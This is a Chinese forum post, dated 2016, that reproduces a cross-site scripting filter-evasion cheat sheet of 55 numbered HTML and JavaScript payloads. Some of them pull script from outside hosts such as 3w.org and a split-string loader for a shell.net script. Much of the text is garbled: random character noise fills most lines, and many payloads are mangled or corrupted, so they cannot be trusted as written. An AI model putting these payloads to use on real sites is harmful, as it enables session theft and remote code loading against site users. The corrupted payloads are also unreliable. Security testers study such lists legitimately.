(1)普通的XSS JavaScript注入
4 \; o4 P; `3 Y7 Y8 \" w<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ H/ U7 }1 e0 \$ s2 |(99)另类弹框
: p8 ^# U4 y; r<q/oncut=alert()>1
1 I. p: e+ R! E& S! z. ?8 H- G3 O<s/onclick=alert()>b
% r. C3 I$ y7 l' A <XSS=" onclick="alert(1)//">clickme</SSX=">
. I: W5 m' X Q* O. Y \4 n' K <zzz onclick=alert`1`>clickme</zzz>
2 b K% t ~+ ]. Q: ^8 Z <a onclick=alert`1`>clickme</a>
& d7 [- l7 p; g) n9 [ ~9 U<a=">clickme</a="> E& h8 ?+ f' o; O3 ?* F
<a=">clickme</a>
# r# r+ T, f) B+ Q5 y: M<z=">clickme</z=">
! k7 [/ {; v; n# n, d3 F# D<z onclick=alert`1`>clickme</z>2 @# ?: \# |- c7 b
3 k, O& Z3 F- _* w8 f(2)IMG标签XSS使用JavaScript命令
; W# V V+ F4 b; p% ]<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>& u, a; j( f D8 W0 d
$ Q D9 e; r0 C5 }5 R6 y! C8 W
(3)IMG标签无分号无引号
( ~% g3 |" {' q( Q3 {8 R- u<IMG SRC=javascript:alert(‘XSS’)>4 ?5 \ j" G" }7 m$ P
6 [) T" L: _2 i
(4)IMG标签大小写不敏感
/ t8 H4 w/ h5 l<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
, m& R* P4 D/ [ v9 L: O: x) e* P5 K o
(5)HTML编码(必须有分号)# d) N3 l2 \1 R; H* R2 R* P: K
<IMG SRC=javascript:alert(“XSS”)>
8 d5 [$ x: ~# C4 D# E I4 Z- n2 H
(6)修正缺陷IMG标签* d a) O# j% l# e6 N
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
2 l/ i( S1 B0 c: R! c* v! X$ p
1 u/ v1 j, ?" c0 G" l ?% u1 h1 w& J(7)formCharCode标签(计算器); b# S1 X6 k. R2 f
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
) t5 f4 d/ o8 h+ C8 P7 b+ n
5 t8 @% u" a7 I: K% u1 O, H: D(8)UTF-8的Unicode编码(计算器)# l: M4 E+ U7 D" A
<IMG SRC=jav..省略..S')>
8 c/ L2 v# ]3 s/ u9 W1 G
; U8 j- {& H2 D; f( ~5 w(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
' p1 R( u7 `& ?* _<IMG SRC=jav..省略..S')>
- G; l# [( F' s
$ ~" y6 b* L0 P' }(10)十六进制编码也是没有分号(计算器)
- j$ v! D* a0 J& d<IMG SRC=\'#\'" /span>
- n6 d7 f4 e; @$ r( _1 p& |% `8 c0 G1 C3 w' i& T
(11)嵌入式标签,将Javascript分开; B" N) ]5 B9 n2 j
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>6 x( c+ D( K I5 O0 z _
P; S# G" E6 a C! f" d" P
(12)嵌入式编码标签,将Javascript分开' X4 e M4 Y( x4 Q9 t
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
5 r) ^' K2 b j3 c+ |& @5 E
& D- h7 O' ]+ I/ {(13)嵌入式换行符
# r$ T, q) e" G6 Z9 U<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>, Q. J! w- B+ V6 W8 Z+ e
8 k O9 L- H# v8 j. i
(14)嵌入式回车
" A& o+ h, i M$ ~, w<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>- d( g4 S7 o( a6 Q
. z1 H8 l! v9 y2 @
(15)嵌入式多行注入JavaScript,这是XSS极端的例子) L7 k! G" y+ U
<IMG SRC=\'#\'" /span>
9 X( e" v) ] \9 v' [2 |+ B# N. J7 W( e% e* ?
(16)解决限制字符(要求同页面): F8 o' z }1 C& y
<script>z=’document.’</script>4 R. @, r5 O1 _" p) [2 l. f
<script>z=z+’write(“‘</script>$ }% J! E6 K1 [2 U7 l6 {. L8 N7 o
<script>z=z+’<script’</script>, K' c# o) F: Y
<script>z=z+’ src=ht’</script>2 h6 V# I% p3 @$ t+ i
<script>z=z+’tp://ww’</script>% h) L( N- m4 p! H
<script>z=z+’w.shell’</script>7 { Q# N b7 `! _
<script>z=z+’.net/1.’</script>" Y& y+ x; Z& s" E3 Z
<script>z=z+’js></sc’</script>8 d7 M A& L5 L; A1 E
<script>z=z+’ript>”)’</script>7 `4 p+ s( N$ b
<script>eval_r(z)</script>
2 K1 h" r7 u8 Z4 x: ~* [& R: P8 K
, a) l2 f+ r0 T# a0 a, F8 J7 `; L(17)空字符& {6 \9 V# n" \! c5 ]# ?8 D, @
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
& S) C2 X* Q; q& b# `
) D# P5 q7 `& z(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
5 ^, h8 y1 \+ a; ]6 k4 nperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out$ X$ C/ E' N% R& { o. U H
+ w, d1 F, m' H(19)Spaces和meta前的IMG标签3 d/ E/ o @( J) @, m" e
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>7 q& d8 u) l6 U- ^4 L1 q
4 _; e# U! U8 E- b/ `. p
(20)Non-alpha-non-digit XSS6 k9 P Z3 M# R: C' x. ^6 \
<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
4 e. s1 M- k5 X5 f6 c7 Q
/ E5 z4 b# K6 L(21)Non-alpha-non-digit XSS to 21 i6 U) O* m# c4 V$ n
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
' s" y+ V8 Q% V. |5 |& U$ [7 W8 s
. y0 D: E+ a; A8 p(22)Non-alpha-non-digit XSS to 34 n+ i- {" W, D9 B3 ^$ o9 h
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
, |* ^9 j( N/ |) C
- R, N+ D- R: e& s% g1 P% B: @& Q(23)双开括号
+ a5 L4 i) U. T<<SCRIPT>alert(“XSS”);//<</SCRIPT>9 |- p0 F2 b0 m% z: s; W( F
5 L6 p4 R% {; N, f/ @(24)无结束脚本标记(仅火狐等浏览器)
/ J* b8 p: H5 G, w7 l z4 a<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>9 K9 O5 x2 \' ~2 | i' e
/ W" s+ @$ U+ j! D7 a(25)无结束脚本标记2
8 q5 x5 E( y; o. w<SCRIPT SRC=//3w.org/XSS/xss.js>3 f; z- |; S0 F/ f. ]
8 d" W' U3 o1 \& I(26)半开的HTML/JavaScript XSS; E" R, d/ T3 Z2 I4 ]! ?* {
<IMG SRC=\'#\'" /span>
2 v \/ `# J+ y& f( b
0 u8 G f/ P4 c(27)双开角括号, h4 a. _9 h; \# V1 l, n1 m
<iframe src=http://3w.org/XSS.html <! x* `5 _ V% g" U6 |+ ?
8 s# `# d1 s5 g+ _, D7 q(28)无单引号 双引号 分号
6 [) T! W3 v: ?7 K' P8 S6 h<SCRIPT>a=/XSS/
1 N+ g+ q# w5 m3 n$ qalert(a.source)</SCRIPT>/ M5 Y- e6 s+ O( o9 G2 S" ?
; N' L% x' }! D$ A. A3 l! Z, |
(29)换码过滤的JavaScript
* g: J/ I5 r; S- t/ F\”;alert(‘XSS’);// T: C( i0 J8 ^& ]9 y
& G1 v0 P% B. p: P( V( j
(30)结束Title标签
7 \7 ~9 O" M; T</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>% u# o; `( i3 T9 M0 S% C; p# R6 J
/ N& O: \( V3 Y+ i) Y% B
(31)Input Image
1 O) m6 |3 D- v<INPUT SRC=\'#\'" /span># g# u/ X! Q. v# u1 p& ~6 S6 p; }# Q
8 k8 V4 ^% ^' m4 l6 i& w
(32)BODY Image8 A( ^9 F& {0 h5 l( B6 r
<BODY BACKGROUND=”javascript:alert(‘XSS’)”> ^0 f$ T' H% {; A, o9 p4 {+ Q( j
$ @& n4 }* ~/ E8 a0 s
(33)BODY标签
( M7 |" @' P3 l0 ]<BODY(‘XSS’)>
9 J2 j+ C8 k8 |, h5 A5 x2 Y
% J v- M; v1 {' }8 q(34)IMG Dynsrc
2 q9 d; D/ W2 y2 H, C. w' x* ^<IMG DYNSRC=\'#\'" /span>
$ j/ @8 {; W, `/ ?9 M* y- v& T( q/ _" c1 e
(35)IMG Lowsrc
6 y. P8 L% H1 C2 k: ]9 L5 c<IMG LOWSRC=\'#\'" /span>
( U; X# w' `$ s; x3 ]6 m8 p3 z% k3 l5 _) v
(36)BGSOUND
$ b3 P+ Y3 h3 n w- l( V<BGSOUND SRC=\'#\'" /span>* y5 t+ p! ]5 b H
, b. @* E& M7 d {
(37)STYLE sheet% Y9 `1 Z% j7 b- a3 G
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>' r! w _! h2 o( v
5 m l5 S7 {4 P(38)远程样式表7 V$ b% D( c9 }9 V, ?& r
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>* k: A) S; ?( k$ H U# w
4 J1 N. z: e# N
(39)List-style-image(列表式)
! l0 @7 a m5 v# A+ X<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS# I4 S- c# |7 m: @ U v7 P* l' {
' ^# W6 f- o' f/ E; [" z(40)IMG VBscript+ l" J x% y2 ?- [2 f
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS" V( c+ ?* I" I! L- ^1 d
* ^! S C% n; \, W( f+ Z$ |# j
(41)META链接url
% E$ P: n- U( I S/ p& Z<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
o4 W5 h6 A: A$ C) ]' @- Z7 Q3 Q. P' B& U. ]
(42)Iframe* ]( ]( D' ^6 R: `
<IFRAME SRC=\'#\'" /IFRAME>) w& f* t8 [+ n; j5 R! S# m
7 O- O/ g8 N, |. G4 D# t2 U(43)Frame% Q( R: o' m8 c- s: W1 i' p
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
* j% P* J% q4 a' V, Z0 s. g6 \- P. F. H3 [
(44)Table- g6 b$ g& W' d, L1 L! b
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
* R8 h7 Q' e- ^7 i0 H# M! ^, K
+ Q; r1 c3 }) J- I(45)TD
! T1 |2 j3 w l! z- ~<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>) z" ~6 x- C& X1 g( i% T
' {4 x; S) f8 d3 I
(46)DIV background-image( I. E, P( d; G: I3 G7 X
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
9 `8 s2 J7 f! N3 [' N J* y
4 p" ^/ I, R% v2 V5 a# A(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)9 Q7 f+ O# r, o4 E7 h, M/ B: u
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>! N2 L% }! G! d7 {5 j; C, y
/ L% V5 h1 {, z8 v$ U(48)DIV expression: @$ [; C4 _7 v* [/ p" Y
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" V: V+ ^- O m0 c; w% b
2 m: @# b9 _1 B( q% Y3 f1 O6 W+ I(49)STYLE属性分拆表达
7 p2 R" s2 ~4 C$ {4 R<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>. s- _8 b5 E3 m* W$ p* z2 i
) n" _: u \- u0 @( p(50)匿名STYLE(组成:开角号和一个字母开头)
9 V1 ?2 v3 q9 G<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ z' N0 T& L% n4 [# p; l1 O6 l( Q. y' s" p) |
(51)STYLE background-image* b! y' P! @6 H/ w6 W
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>2 T+ _: t8 \/ s/ P
9 A. X' G) T% l5 B
(52)IMG STYLE方式5 a- B0 o( b3 R1 f! g
exppression(alert(“XSS”))’>7 r' g3 d$ ^7 }- h: q1 M
# `) r Q8 {& b5 U! _. U2 _2 a. e(53)STYLE background
) A/ n5 n8 k5 W<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 _: l5 t8 W: G5 F# t8 E0 `+ k2 u8 |
(54)BASE
) [$ O+ Z- y+ W/ T! K2 b3 _( R<BASE HREF=”javascript:alert(‘XSS’);//”>9 G6 y6 n0 X( s' u0 Q
& |" L ` n- P7 o+ T7 V" F" N' C(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
6 [" u! a5 l6 H& K2 S' r" i7 `<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>
2 s! L, j* w5 M |
发表于 2016-4-28 10:06:15
收藏
支持
反对